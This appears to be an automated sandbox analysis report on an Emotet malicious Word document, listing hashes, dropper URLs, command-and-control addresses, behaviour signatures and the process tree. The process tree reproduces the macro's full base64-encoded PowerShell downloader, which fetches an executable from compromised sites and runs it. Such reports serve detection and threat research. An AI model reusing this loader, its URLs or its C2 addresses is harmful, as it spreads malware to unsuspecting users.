Analysis

  • max time kernel
    139s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    28-07-2020 19:21

General

  • Target

    emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc

  • Size

    169KB

  • MD5

    ddad3a37c0baf5a29ca82714192d633a

  • SHA1

    abf92157c3674f7523669579fb83b2936de887b9

  • SHA256

    8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28

  • SHA512

    68bfa0abca5e93d43be987277469f643a89159e2d10fc31bbbe507486f02555151417ce8c29fffa51024e7cd039a7854992be34823ef68762b21bf828a36062c

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://w3art.com/dtla/bBmTEkbPK/

exe.dropper

http://www.stempora.com/@mer/ybV/

exe.dropper

http://sundaystudio.net/cgi-bin/bzsvy9778486/

exe.dropper

http://sujest.com/BL/nQsQRv/

exe.dropper

http://studiotoybox.com/common/qezZSZB/

Extracted

Family

emotet

C2

177.37.81.212:443

74.207.230.187:8080

190.164.75.175:80

87.252.100.28:80

105.209.239.55:80

163.172.107.70:8080

37.208.106.146:8080

24.157.25.203:80

212.112.113.235:80

140.207.113.106:443

75.139.38.211:80

192.210.217.94:8080

46.49.124.53:80

75.127.14.170:8080

87.106.231.60:8080

139.59.12.63:8080

181.167.35.84:80

201.214.108.231:80

74.208.173.91:8080

189.146.1.78:443

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_8b8a580cd020e0bd0471666b6354c24211f043403e1924ae8ae94c1b0a630c28_2020-07-28__192059._doc.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4028
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABZAFUATgBDAEwAbABoAHgAPQAnAEUASQBBAFYARQB2AHgAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAGAAVQBSAEkAVAB5AGAAUAByAE8AdABvAGAAYwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABSAE4ATgBZAEoAawB4AG8AIAA9ACAAJwA5ADIAMAAnADsAJABXAEYAVQBQAEMAZQBnAHMAPQAnAFkATgBTAEIATgBwAGwAcwAnADsAJABBAEsAWgBUAEkAdQBkAHYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIATgBOAFkASgBrAHgAbwArACcALgBlAHgAZQAnADsAJABYAFkATgBNAEwAcwB6AG0APQAnAFcASgBSAEEATwBtAG8AcwAnADsAJABIAEMARwBPAEgAagB2AGkAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAYwBMAGkAZQBuAHQAOwAkAFEATwBQAFMAWAB3AHkAZwA9ACcAaAB0AHQAcAA6AC8ALwB3ADMAYQByAHQALgBjAG8AbQAvAGQAdABsAGEALwBiAEIAbQBUAEUAawBiAFAASwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHMAdABlAG0AcABvAHIAYQAuAGMAbwBtAC8AQABtAGUAcgAvAHkAYgBWAC8AKgBoAHQAdABwADoALwAvAHMAdQBuAGQAYQB5AHMAdAB1AGQAaQBvAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AYgB6AHMAdgB5ADkANwA3ADgANAA4ADYALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGoAZQBzAHQALgBjAG8AbQAvAEIATAAvAG4AUQBzAFEAUgB2AC8AKgBoAHQAdABwADoALwAvAHMAdAB1AGQAaQBvAHQAbwB5AGIAbwB4AC4AYwBvAG0ALwBjAG8AbQBtAG8AbgAvAHEAZQB6AFoAUwBaAEIALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUARQBLAFkARgB0AGQAeQA9ACcATABIAE4ARwBTAGQAeQB4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAFcAQwBZAEIAbABrAG0AIABpAG4AIAAkAFEATwBQAFMAWAB3AHkAZwApAHsAdAByAHkAewAkAEgAQwBHAE8ASABqAHYAaQAuACIAZABPAGAAVwBuAEwATwBgAEEAZABgAEYAaQBMAGUAIgAoACQAWABXAEMAWQBCAGwAawBtACwAIAAkAEEASwBaAFQASQB1AGQAdgApADsAJABWAEsAVQBCAFEAcABsAGoAPQAnAEwAWQBaAEcATQB1AHoAaAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEEASwBaAFQASQB1AGQAdgApAC4AIgBsAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADMAMAA1ADAAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAGAAVABFACIAKAAkAEEASwBaAFQASQB1AGQAdgApADsAJABaAFMAVQBJAE0AZABuAGUAPQAnAFEAUgBPAEIAUQBtAHMAaQAnADsAYgByAGUAYQBrADsAJABDAE4AVgBNAFYAawByAGEAPQAnAEYAVQBTAEgATABwAGsAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAEIASQBZAEQAbABnAHQAPQAnAFgAVwBJAFQAVQBtAGQAZQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    PID:3460
  • C:\Users\Admin\920.exe
    C:\Users\Admin\920.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:3980
    • C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe
      "C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:3372

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\920.exe
  • C:\Users\Admin\920.exe
  • C:\Windows\SysWOW64\KBDIC\Windows.ApplicationModel.LockScreen.exe
  • memory/3372-11-0x0000000000000000-mapping.dmp
  • memory/3372-13-0x0000000000700000-0x000000000070C000-memory.dmp
    Filesize

    48KB

  • memory/3980-10-0x00000000005B0000-0x00000000005BC000-memory.dmp
    Filesize

    48KB

  • memory/4028-3-0x0000027CD15B4000-0x0000027CD15B5000-memory.dmp
    Filesize

    4KB